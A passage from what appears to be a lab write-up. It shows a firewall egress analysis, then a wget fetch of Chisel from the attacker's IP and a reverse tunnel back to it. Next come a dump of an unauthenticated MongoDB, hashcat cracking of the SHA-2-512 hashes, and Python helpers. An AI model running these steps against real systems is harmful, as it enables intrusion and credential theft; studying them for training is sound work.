MongoDB


After gaining the initial foothold, I found a Docker container running with the IP address 172.17.0.2.

This matches the earlier suspicion of an internal host, which was hinted at in the todo note file.

www-data@ubuntu:/var/tmp$ cat /etc/ufw/user.rules
 
[...REDACTED...]
 
### tuple ### allow tcp 80 0.0.0.0/0 any 0.0.0.0/0 in
-A ufw-user-input -p tcp --dport 80 -j ACCEPT
 
### tuple ### allow any 27017 127.0.0.1 any 0.0.0.0/0 out
-A ufw-user-output -p tcp -d 127.0.0.1 --dport 27017 -j ACCEPT
-A ufw-user-output -p udp -d 127.0.0.1 --dport 27017 -j ACCEPT
 
### tuple ### allow any 27017 172.17.0.2 any 0.0.0.0/0 out
-A ufw-user-output -p tcp -d 172.17.0.2 --dport 27017 -j ACCEPT
-A ufw-user-output -p udp -d 172.17.0.2 --dport 27017 -j ACCEPT
 
### tuple ### allow tcp 6000:6007 0.0.0.0/0 any 0.0.0.0/0 out
-A ufw-user-output -p tcp -m multiport --dports 6000:6007 -j ACCEPT
 

A review of the firewall configuration (/etc/ufw/user.rules) shows how traffic is constrained. Inbound, only TCP 80 is allowed. Outbound, the only permitted destinations are 127.0.0.1 and 172.17.0.2 on port 27017 (TCP and UDP) and TCP ports 6000 through 6007 to any host. A docker-proxy process is also running, forwarding the host's 127.0.0.1:27017 to the MongoDB service in the container at 172.17.0.2:27017. Explicit outbound allow rules like these only matter when the default outgoing policy is deny (DEFAULT_OUTPUT_POLICY in /etc/default/ufw), which makes the 6000:6007 range the natural egress channel for a tunnel.

The routing table also shows a route to the 172.17.0.0/24 network, so the target is attached to the Docker bridge: MongoDB is not installed on the target itself but runs in the container and is reached through the published port.
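Picking a port for the tunnel is a decision the firewall makes for you, so it is worth answering it mechanically. The following is an added example (not code from the original writeup) that parses the `### tuple ###` comment lines ufw writes into user.rules and evaluates which outbound destinations and ports are reachable. RULES is the excerpt shown above; the tuple layout `action proto dport dst sport src [direction]` is ufw's own, and a default outgoing policy of deny is assumed, since explicit `out` allow rules would be redundant under the default of allow.

```python
"""Answer "which outbound destinations and ports does ufw let this host reach?"
from the '### tuple ###' comments in /etc/ufw/user.rules.

Added example, not part of the original writeup. RULES is the excerpt shown in
the writeup; the parser assumes ufw's tuple layout
    action proto dport dst sport src [direction]
and, as an assumption, a default outgoing policy of deny (DEFAULT_OUTPUT_POLICY
in /etc/default/ufw), the only setting under which explicit 'out' allow rules
like these change anything.
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass

RULES = """\
### tuple ### allow tcp 80 0.0.0.0/0 any 0.0.0.0/0 in
-A ufw-user-input -p tcp --dport 80 -j ACCEPT

### tuple ### allow any 27017 127.0.0.1 any 0.0.0.0/0 out
-A ufw-user-output -p tcp -d 127.0.0.1 --dport 27017 -j ACCEPT
-A ufw-user-output -p udp -d 127.0.0.1 --dport 27017 -j ACCEPT

### tuple ### allow any 27017 172.17.0.2 any 0.0.0.0/0 out
-A ufw-user-output -p tcp -d 172.17.0.2 --dport 27017 -j ACCEPT
-A ufw-user-output -p udp -d 172.17.0.2 --dport 27017 -j ACCEPT

### tuple ### allow tcp 6000:6007 0.0.0.0/0 any 0.0.0.0/0 out
-A ufw-user-output -p tcp -m multiport --dports 6000:6007 -j ACCEPT
"""

TUPLE_RE = re.compile(
    r"^###\s+tuple\s+###\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)(?:\s+(in|out))?"
)


@dataclass(frozen=True)
class Rule:
    action: str                 # allow / deny / reject / limit
    proto: str                  # tcp / udp / any
    dport: tuple[int, int]      # inclusive range, (0, 65535) for 'any'
    dst: ipaddress.IPv4Network
    direction: str              # in / out


def _port_range(spec: str) -> tuple[int, int]:
    if spec == "any":
        return (0, 65535)
    lo, _, hi = spec.partition(":")
    return (int(lo), int(hi or lo))


def parse_rules(text: str) -> list[Rule]:
    """Parse the tuple comments; the iptables lines that follow each are ignored."""
    rules = []
    for line in text.splitlines():
        m = TUPLE_RE.match(line)
        if not m:
            continue
        action, proto, dport, dst, _sport, _src, direction = m.groups()
        rules.append(Rule(action, proto, _port_range(dport),
                          ipaddress.ip_network(dst, strict=False),
                          direction or "in"))  # assumption: no direction means inbound
    return rules


def egress_allowed(rules: list[Rule], dst_ip: str, port: int,
                   proto: str = "tcp", default_policy: str = "deny") -> bool:
    """First matching 'out' rule decides, as in the iptables chain ufw builds;
    with no match the default outgoing policy applies."""
    ip = ipaddress.ip_address(dst_ip)
    for r in rules:
        if r.direction != "out" or r.proto not in (proto, "any"):
            continue
        if r.dport[0] <= port <= r.dport[1] and ip in r.dst:
            return r.action == "allow"
    return default_policy == "allow"


def egress_options(rules: list[Rule]) -> list[str]:
    """Outbound allows in readable form: where a tunnel or callback can go."""
    out = []
    for r in rules:
        if r.direction == "out" and r.action == "allow":
            lo, hi = r.dport
            ports = "any" if (lo, hi) == (0, 65535) else (str(lo) if lo == hi else f"{lo}:{hi}")
            out.append(f"{r.proto} {ports} -> {r.dst}")
    return out


if __name__ == "__main__":
    rules = parse_rules(RULES)
    print("outbound allows:", *egress_options(rules), sep="\n  ")
    kali = "192.168.45.218"  # attacker address used in the writeup
    for port in (443, 4444, 6004, 6006, 6008, 27017):
        state = "allowed" if egress_allowed(rules, kali, port) else "blocked"
        print(f"tcp/{port} to {kali}: {state}")
```

Run against the excerpt it reports that a callback to Kali on 443 or 4444 would be dropped while 6004 and 6006 go through, which is exactly why those two ports are used for the Chisel server and the HTTP delivery below.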

Tunneling


Since the MongoDB instance is reachable only from the target itself (127.0.0.1:27017 via docker-proxy, or 172.17.0.2:27017 on the bridge), the socket has to be tunneled back to Kali.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ chisel server -p 6004 --reverse 
2025/03/09 23:54:22 server: Reverse tunnelling enabled
2025/03/09 23:54:22 server: Fingerprint x8SJNrFTzT27rru9u/spzWu+joVnsK3aH20po74QHm0=
2025/03/09 23:54:22 server: Listening on http://0.0.0.0:6004

Start a Chisel server on Kali port 6004 in reverse mode. The port is chosen deliberately: the ufw egress rules allow outbound TCP 6000:6007, so the target can connect back to it.

www-data@ubuntu:/var/tmp$ wget -q http://192.168.45.218:6006/chiselx64 ; chmod 755 ./chiselx64

Delivery over HTTP on port 6006, likewise inside the permitted 6000:6007 range.

www-data@ubuntu:/var/tmp$ ./chiselx64 client --fingerprint 'x8SJNrFTzT27rru9u/spzWu+joVnsK3aH20po74QHm0=' 192.168.45.218:6004 R:27017:127.0.0.1:27017 &
 
[1] 10362
2025/03/09 22:54:48 client: Connecting to ws://192.168.45.218:6004
2025/03/09 22:54:48 client: Fingerprint x8SJNrFTzT27rru9u/spzWu+joVnsK3aH20po74QHm0=
2025/03/09 22:54:48 client: Connected (Latency 25.914345ms)

The R: argument opens a reverse port forward: Kali's 127.0.0.1:27017 is forwarded through the Chisel session to 127.0.0.1:27017 on the target, which docker-proxy in turn hands to the MongoDB container.

Session established. Any client on Kali that connects to localhost:27017 is now talking to the target's MongoDB over the channel on port 6004.

mongo client


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ mongo mongodb://127.0.0.1:27017/      
MongoDB shell version v7.0.14
connecting to: mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("05409fbc-3ee0-44f8-8831-aa66f8dea8d7") }
MongoDB server version: 4.4.3
WARNING: shell and server versions do not match
================
Warning: the "mongo" shell has been superseded by "mongosh",
which delivers improved usability and compatibility.The "mongo" shell has been deprecated and will be removed in
an upcoming release.
For installation instructions, see
https://docs.mongodb.com/mongodb-shell/install/
================
---
The server generated these startup warnings when booting: 
        2024-08-03T00:16:58.022+00:00: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine. See http://dochub.mongodb.org/core/prodnotes-filesystem
        2024-08-03T00:16:58.518+00:00: Access control is not enabled for the database. Read and write access to data and configuration is unrestricted
---
> 

Connected to the target MongoDB instance without supplying any credentials. The server's own startup warning confirms why: access control is not enabled, so read and write access to every database is unrestricted.

> show dbs
admin   0.000GB
config  0.000GB
local   0.000GB
staffs  0.000GB

The staffs DB is the only non-default database; admin, config and local are always present.

admin and config DBs


> db.system.version.find()
{ "_id" : "featureCompatibilityVersion", "version" : "4.4" }
> use config
switched to db config
> show collections
system.sessions
> db.system.sessions.find()
{ "_id" : { "id" : UUID("9d98fb48-3e71-4b9b-9c10-7f33026fa70a"), "uid" : BinData(0,"47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=") }, "lastUse" : ISODate("2025-03-09T22:36:55.832Z") }
{ "_id" : { "id" : UUID("05409fbc-3ee0-44f8-8831-aa66f8dea8d7"), "uid" : BinData(0,"47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=") }, "lastUse" : ISODate("2025-03-09T22:56:55.827Z") }
{ "_id" : { "id" : UUID("a08ccf23-0fb7-43c3-8682-bd36d8845f98"), "uid" : BinData(0,"47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=") }, "lastUse" : ISODate("2025-03-09T22:56:55.827Z") }

Both admin and config are default databases with nothing of interest. One detail in config.system.sessions is worth noting: the uid 47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU= is the SHA-256 of the empty string, which is what MongoDB records for a session with no authenticated user. All three sessions, including the one belonging to this shell (05409fbc-3ee0-44f8-8831-aa66f8dea8d7), are anonymous.

local DB


> use local
switched to db local
> show collections
startup_log
> db.startup_log.find()
{ "_id" : "85b45169ebbf-1614087432397", "hostname" : "85b45169ebbf", "startTime" : ISODate("2021-02-23T13:37:12Z"), "startTimeLocal" : "Tue Feb 23 13:37:12.397", "cmdLine" : { "net" : { "bindIp" : "*" } }, "pid" : NumberLong(1), "buildinfo" : { "version" : "4.4.3", "gitVersion" : "913d6b62acfbb344dde1b116f4161360acd8fd13", "modules" : [ ], "allocator" : "tcmalloc", "javascriptEngine" : "mozjs", "sysInfo" : "deprecated", "versionArray" : [ 4, 4, 3, 0 ], "openssl" : { "running" : "OpenSSL 1.1.1  11 Sep 2018", "compiled" : "OpenSSL 1.1.1  11 Sep 2018" }, "buildEnvironment" : { "distmod" : "ubuntu1804", "distarch" : "x86_64", "cc" : "/opt/mongodbtoolchain/v3/bin/gcc: gcc (GCC) 8.2.0", "ccflags" : "-fno-omit-frame-pointer -fno-strict-aliasing -fasynchronous-unwind-tables -ggdb -pthread -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -Werror -O2 -Wno-unused-local-typedefs -Wno-unused-function -Wno-deprecated-declarations -Wno-unused-const-variable -Wno-unused-but-set-variable -Wno-missing-braces -fstack-protector-strong -fno-builtin-memcmp", "cxx" : "/opt/mongodbtoolchain/v3/bin/g++: g++ (GCC) 8.2.0", "cxxflags" : "-Woverloaded-virtual -Wno-maybe-uninitialized -fsized-deallocation -std=c++17", "linkflags" : "-pthread -Wl,-z,now -rdynamic -Wl,--fatal-warnings -fstack-protector-strong -fuse-ld=gold -Wl,--no-threads -Wl,--build-id -Wl,--hash-style=gnu -Wl,-z,noexecstack -Wl,--warn-execstack -Wl,-z,relro -Wl,-z,origin -Wl,--enable-new-dtags", "target_arch" : "x86_64", "target_os" : "linux", "cppdefines" : "SAFEINT_USE_INTRINSICS 0 PCRE_STATIC NDEBUG _XOPEN_SOURCE 700 _GNU_SOURCE _FORTIFY_SOURCE 2 BOOST_THREAD_VERSION 5 BOOST_THREAD_USES_DATETIME BOOST_SYSTEM_NO_DEPRECATED BOOST_MATH_NO_LONG_DOUBLE_MATH_FUNCTIONS BOOST_ENABLE_ASSERT_DEBUG_HANDLER BOOST_LOG_NO_SHORTHAND_NAMES BOOST_LOG_USE_NATIVE_SYSLOG BOOST_LOG_WITHOUT_THREAD_ATTR ABSL_FORCE_ALIGNED_ACCESS" }, "bits" : 64, "debug" : false, "maxBsonObjectSize" : 16777216, "storageEngines" : [ "biggie", "devnull", 
"ephemeralForTest", "wiredTiger" ] } }
{ "_id" : "85b45169ebbf-1614087541430", "hostname" : "85b45169ebbf", "startTime" : ISODate("2021-02-23T13:39:01Z"), "startTimeLocal" : "Tue Feb 23 13:39:01.430", "cmdLine" : { "net" : { "bindIp" : "*" } }, "pid" : NumberLong(1), "buildinfo" : { "version" : "4.4.3", "gitVersion" : "913d6b62acfbb344dde1b116f4161360acd8fd13", "modules" : [ ], "allocator" : "tcmalloc", "javascriptEngine" : "mozjs", "sysInfo" : "deprecated", "versionArray" : [ 4, 4, 3, 0 ], "openssl" : { "running" : "OpenSSL 1.1.1  11 Sep 2018", "compiled" : "OpenSSL 1.1.1  11 Sep 2018" }, "buildEnvironment" : { "distmod" : "ubuntu1804", "distarch" : "x86_64", "cc" : "/opt/mongodbtoolchain/v3/bin/gcc: gcc (GCC) 8.2.0", "ccflags" : "-fno-omit-frame-pointer -fno-strict-aliasing -fasynchronous-unwind-tables -ggdb -pthread -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -Werror -O2 -Wno-unused-local-typedefs -Wno-unused-function -Wno-deprecated-declarations -Wno-unused-const-variable -Wno-unused-but-set-variable -Wno-missing-braces -fstack-protector-strong -fno-builtin-memcmp", "cxx" : "/opt/mongodbtoolchain/v3/bin/g++: g++ (GCC) 8.2.0", "cxxflags" : "-Woverloaded-virtual -Wno-maybe-uninitialized -fsized-deallocation -std=c++17", "linkflags" : "-pthread -Wl,-z,now -rdynamic -Wl,--fatal-warnings -fstack-protector-strong -fuse-ld=gold -Wl,--no-threads -Wl,--build-id -Wl,--hash-style=gnu -Wl,-z,noexecstack -Wl,--warn-execstack -Wl,-z,relro -Wl,-z,origin -Wl,--enable-new-dtags", "target_arch" : "x86_64", "target_os" : "linux", "cppdefines" : "SAFEINT_USE_INTRINSICS 0 PCRE_STATIC NDEBUG _XOPEN_SOURCE 700 _GNU_SOURCE _FORTIFY_SOURCE 2 BOOST_THREAD_VERSION 5 BOOST_THREAD_USES_DATETIME BOOST_SYSTEM_NO_DEPRECATED BOOST_MATH_NO_LONG_DOUBLE_MATH_FUNCTIONS BOOST_ENABLE_ASSERT_DEBUG_HANDLER BOOST_LOG_NO_SHORTHAND_NAMES BOOST_LOG_USE_NATIVE_SYSLOG BOOST_LOG_WITHOUT_THREAD_ATTR ABSL_FORCE_ALIGNED_ACCESS" }, "bits" : 64, "debug" : false, "maxBsonObjectSize" : 16777216, "storageEngines" : [ "biggie", "devnull", 
"ephemeralForTest", "wiredTiger" ] } }
{ "_id" : "85b45169ebbf-1614089472125", "hostname" : "85b45169ebbf", "startTime" : ISODate("2021-02-23T14:11:12Z"), "startTimeLocal" : "Tue Feb 23 14:11:12.125", "cmdLine" : { "net" : { "bindIp" : "*" } }, "pid" : NumberLong(1), "buildinfo" : { "version" : "4.4.3", "gitVersion" : "913d6b62acfbb344dde1b116f4161360acd8fd13", "modules" : [ ], "allocator" : "tcmalloc", "javascriptEngine" : "mozjs", "sysInfo" : "deprecated", "versionArray" : [ 4, 4, 3, 0 ], "openssl" : { "running" : "OpenSSL 1.1.1  11 Sep 2018", "compiled" : "OpenSSL 1.1.1  11 Sep 2018" }, "buildEnvironment" : { "distmod" : "ubuntu1804", "distarch" : "x86_64", "cc" : "/opt/mongodbtoolchain/v3/bin/gcc: gcc (GCC) 8.2.0", "ccflags" : "-fno-omit-frame-pointer -fno-strict-aliasing -fasynchronous-unwind-tables -ggdb -pthread -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -Werror -O2 -Wno-unused-local-typedefs -Wno-unused-function -Wno-deprecated-declarations -Wno-unused-const-variable -Wno-unused-but-set-variable -Wno-missing-braces -fstack-protector-strong -fno-builtin-memcmp", "cxx" : "/opt/mongodbtoolchain/v3/bin/g++: g++ (GCC) 8.2.0", "cxxflags" : "-Woverloaded-virtual -Wno-maybe-uninitialized -fsized-deallocation -std=c++17", "linkflags" : "-pthread -Wl,-z,now -rdynamic -Wl,--fatal-warnings -fstack-protector-strong -fuse-ld=gold -Wl,--no-threads -Wl,--build-id -Wl,--hash-style=gnu -Wl,-z,noexecstack -Wl,--warn-execstack -Wl,-z,relro -Wl,-z,origin -Wl,--enable-new-dtags", "target_arch" : "x86_64", "target_os" : "linux", "cppdefines" : "SAFEINT_USE_INTRINSICS 0 PCRE_STATIC NDEBUG _XOPEN_SOURCE 700 _GNU_SOURCE _FORTIFY_SOURCE 2 BOOST_THREAD_VERSION 5 BOOST_THREAD_USES_DATETIME BOOST_SYSTEM_NO_DEPRECATED BOOST_MATH_NO_LONG_DOUBLE_MATH_FUNCTIONS BOOST_ENABLE_ASSERT_DEBUG_HANDLER BOOST_LOG_NO_SHORTHAND_NAMES BOOST_LOG_USE_NATIVE_SYSLOG BOOST_LOG_WITHOUT_THREAD_ATTR ABSL_FORCE_ALIGNED_ACCESS" }, "bits" : 64, "debug" : false, "maxBsonObjectSize" : 16777216, "storageEngines" : [ "biggie", "devnull", 
"ephemeralForTest", "wiredTiger" ] } }
{ "_id" : "85b45169ebbf-1722644218546", "hostname" : "85b45169ebbf", "startTime" : ISODate("2024-08-03T00:16:58Z"), "startTimeLocal" : "Sat Aug  3 00:16:58.546", "cmdLine" : { "net" : { "bindIp" : "*" } }, "pid" : NumberLong(1), "buildinfo" : { "version" : "4.4.3", "gitVersion" : "913d6b62acfbb344dde1b116f4161360acd8fd13", "modules" : [ ], "allocator" : "tcmalloc", "javascriptEngine" : "mozjs", "sysInfo" : "deprecated", "versionArray" : [ 4, 4, 3, 0 ], "openssl" : { "running" : "OpenSSL 1.1.1  11 Sep 2018", "compiled" : "OpenSSL 1.1.1  11 Sep 2018" }, "buildEnvironment" : { "distmod" : "ubuntu1804", "distarch" : "x86_64", "cc" : "/opt/mongodbtoolchain/v3/bin/gcc: gcc (GCC) 8.2.0", "ccflags" : "-fno-omit-frame-pointer -fno-strict-aliasing -fasynchronous-unwind-tables -ggdb -pthread -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -Werror -O2 -Wno-unused-local-typedefs -Wno-unused-function -Wno-deprecated-declarations -Wno-unused-const-variable -Wno-unused-but-set-variable -Wno-missing-braces -fstack-protector-strong -fno-builtin-memcmp", "cxx" : "/opt/mongodbtoolchain/v3/bin/g++: g++ (GCC) 8.2.0", "cxxflags" : "-Woverloaded-virtual -Wno-maybe-uninitialized -fsized-deallocation -std=c++17", "linkflags" : "-pthread -Wl,-z,now -rdynamic -Wl,--fatal-warnings -fstack-protector-strong -fuse-ld=gold -Wl,--no-threads -Wl,--build-id -Wl,--hash-style=gnu -Wl,-z,noexecstack -Wl,--warn-execstack -Wl,-z,relro -Wl,-z,origin -Wl,--enable-new-dtags", "target_arch" : "x86_64", "target_os" : "linux", "cppdefines" : "SAFEINT_USE_INTRINSICS 0 PCRE_STATIC NDEBUG _XOPEN_SOURCE 700 _GNU_SOURCE _FORTIFY_SOURCE 2 BOOST_THREAD_VERSION 5 BOOST_THREAD_USES_DATETIME BOOST_SYSTEM_NO_DEPRECATED BOOST_MATH_NO_LONG_DOUBLE_MATH_FUNCTIONS BOOST_ENABLE_ASSERT_DEBUG_HANDLER BOOST_LOG_NO_SHORTHAND_NAMES BOOST_LOG_USE_NATIVE_SYSLOG BOOST_LOG_WITHOUT_THREAD_ATTR ABSL_FORCE_ALIGNED_ACCESS" }, "bits" : 64, "debug" : false, "maxBsonObjectSize" : 16777216, "storageEngines" : [ "biggie", "devnull", 
"ephemeralForTest", "wiredTiger" ] } }

The startup_log collection in the local DB records every start of the mongod. The hostname 85b45169ebbf is the container ID (a Docker container's default hostname), not the Docker host, and the recorded cmdLine contains only net.bindIp: "*", so mongod listens on all interfaces inside the container with no security.authorization setting, consistent with the "access control is not enabled" warning.

staffs DB


> use staffs
switched to db staffs
> show collections
ssh_login
> db.ssh_login.find()
{ "_id" : ObjectId("603505584a98f28de50cc0f4"), "name" : "root", "pw_hash" : "5ff837a98703011de7d0a576ca9a84be6f9e4a798329423c8200beabd0f178656591fdac53ff785e71062dd2473d6dc1bb822a7dce1fc626ee44855466f3c8e1", "role" : "dev" }
{ "_id" : ObjectId("603505584a98f28de50cc0f5"), "name" : "carlos", "pw_hash" : "20132c01e17d4267d316fbfd721becd6a2656b061b365a5d76efdefb386d74a489ebe323bb65fecfe7404aef00f574e6fcce668f0f358ea7bc12c9ef25eb7804", "role" : "manager" }
{ "_id" : ObjectId("603505584a98f28de50cc0f6"), "name" : "enox", "pw_hash" : "216572a4d605f2805f918ba0d6b1ade045076832d7bb5476d7ede7d9159121b88edb398d28b470df263d8d2a710e86f27f1a27e66137efae46cb47de87916cee", "role" : "admin" }

The staffs DB holds an ssh_login collection with password hashes for three users (root, carlos and enox). Each pw_hash is 128 hex characters, i.e. a 512-bit digest, and there is no salt field.

This is the collection the note file referred to.

Password Cracking

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ hashcat --show ./hashes.txt                                       
 
      # | Name                                                       | Category
  ======+============================================================+======================================
   1700 | SHA2-512                                                   | Raw Hash
  17600 | SHA3-512                                                   | Raw Hash
  11800 | GOST R 34.11-2012 (Streebog) 512-bit, big-endian           | Raw Hash
  18000 | Keccak-512                                                 | Raw Hash
   6100 | Whirlpool                                                  | Raw Hash
   1770 | sha512(utf16le($pass))                                     | Raw Hash
  21000 | BitShares v0.x - sha512(sha512_bin(pass))                  | Cryptocurrency Wallet
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ hashcat -a 0 -m 1700 ./hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 3 digests; 3 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Host memory required for this attack: 3 MB
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
216572a4d605f2805f918ba0d6b1ade045076832d7bb5476d7ede7d9159121b88edb398d28b470df263d8d2a710e86f27f1a27e66137efae46cb47de87916cee:bagabaga
5ff837a98703011de7d0a576ca9a84be6f9e4a798329423c8200beabd0f178656591fdac53ff785e71062dd2473d6dc1bb822a7dce1fc626ee44855466f3c8e1:1oyindamola
 
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1700 (SHA2-512)
Hash.Target......: ./hashes.txt
Time.Started.....: Mon Mar 10 00:07:48 2025 (2 secs)
Time.Estimated...: Mon Mar 10 00:07:50 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  6521.0 kH/s (0.55ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 2/3 (66.67%) Digests (total), 2/3 (66.67%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[216361726f6c796e] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 32%
 
Started: Mon Mar 10 00:07:30 2025
Stopped: Mon Mar 10 00:07:51 2025

Two of the three hashes were cracked against rockyou.txt in about two seconds, a consequence of the hashes being unsalted single-round SHA-512 rather than a proper password hash; carlos's hash did not fall to the list:

  • enox:bagabaga
  • root:1oyindamola
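The step the writeup skips is turning the mongo shell dump into hashes.txt and confirming which of hashcat's candidate modes actually applies. The following is an added example (not code from the original writeup) that extracts the name/pw_hash pairs from the find() output shown above, narrows the digest type by length and runs a straight dictionary attack offline; WORDLIST is a small constructed stand-in for rockyou.txt, and nothing here talks to MongoDB or hashcat.

```python
"""Extract the staffs.ssh_login hashes from the mongo shell dump, identify the
digest type by length and run a dictionary attack offline.

Added example, not from the original writeup. MONGO_DUMP is the find() output
shown in the writeup; WORDLIST is a small constructed stand-in for rockyou.txt.
hashcat mode 1700 is raw, unsalted SHA-512, so a candidate is verified simply
by hashing it and comparing digests.
"""
from __future__ import annotations

import hashlib
import re

MONGO_DUMP = """\
{ "_id" : ObjectId("603505584a98f28de50cc0f4"), "name" : "root", "pw_hash" : "5ff837a98703011de7d0a576ca9a84be6f9e4a798329423c8200beabd0f178656591fdac53ff785e71062dd2473d6dc1bb822a7dce1fc626ee44855466f3c8e1", "role" : "dev" }
{ "_id" : ObjectId("603505584a98f28de50cc0f5"), "name" : "carlos", "pw_hash" : "20132c01e17d4267d316fbfd721becd6a2656b061b365a5d76efdefb386d74a489ebe323bb65fecfe7404aef00f574e6fcce668f0f358ea7bc12c9ef25eb7804", "role" : "manager" }
{ "_id" : ObjectId("603505584a98f28de50cc0f6"), "name" : "enox", "pw_hash" : "216572a4d605f2805f918ba0d6b1ade045076832d7bb5476d7ede7d9159121b88edb398d28b470df263d8d2a710e86f27f1a27e66137efae46cb47de87916cee", "role" : "admin" }
"""

# Constructed wordlist: a few decoys plus the two passwords hashcat recovered.
WORDLIST = ["password", "123456", "carlos", "phobos", "bagabaga", "1oyindamola"]

# Unsalted algorithms hashlib guarantees. Candidates are chosen by digest size,
# the same ambiguity hashcat's autodetect reported (1700, 17600, 18000, ...).
ALGOS = ("md5", "sha1", "sha256", "sha512", "sha3_256", "sha3_512", "blake2b", "blake2s")

DOC_RE = re.compile(r'"name"\s*:\s*"([^"]+)".*?"pw_hash"\s*:\s*"([0-9a-fA-F]+)"')


def extract_hashes(dump: str) -> dict[str, str]:
    """Map user name -> lowercase hex digest from the shell's find() output."""
    return {m.group(1): m.group(2).lower() for m in DOC_RE.finditer(dump)}


def hashcat_lines(hashes: dict[str, str], with_username: bool = False) -> list[str]:
    """Lines for hashes.txt; with_username=True gives user:hash for hashcat --username."""
    return [f"{n}:{h}" if with_username else h for n, h in hashes.items()]


def candidate_algorithms(hexdigest: str) -> list[str]:
    """Algorithms whose output length matches: 128 hex chars -> 512-bit digests."""
    return [a for a in ALGOS if hashlib.new(a).digest_size * 2 == len(hexdigest)]


def crack(hashes: dict[str, str], wordlist: list[str]) -> dict[str, tuple[str, str]]:
    """Straight dictionary attack (hashcat -a 0) over every candidate algorithm.

    Returns {user: (algorithm, password)} for each hash that matched. The
    hashes are unsalted, so one digest per (algorithm, word) is compared
    against every user at once, which is why a 14M-word list finishes in seconds.
    """
    by_digest: dict[str, list[str]] = {}
    for name, h in hashes.items():
        by_digest.setdefault(h, []).append(name)
    algos = sorted({a for h in hashes.values() for a in candidate_algorithms(h)})
    found: dict[str, tuple[str, str]] = {}
    for word in wordlist:
        data = word.encode()
        for algo in algos:
            for name in by_digest.get(hashlib.new(algo, data).hexdigest(), []):
                found.setdefault(name, (algo, word))
    return found


if __name__ == "__main__":
    hashes = extract_hashes(MONGO_DUMP)
    print("\n".join(hashcat_lines(hashes, with_username=True)))
    print("candidate algorithms:", candidate_algorithms(next(iter(hashes.values()))))
    cracked = crack(hashes, WORDLIST)
    for name in hashes:
        print(name, "->", cracked.get(name, "not in wordlist"))
```

Because the digest length alone cannot separate SHA-512 from SHA3-512 or BLAKE2b, the attack simply tries all of them; whichever algorithm produces the match is the mode to use for the remaining hash in hashcat.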

The root account’s credential will be tested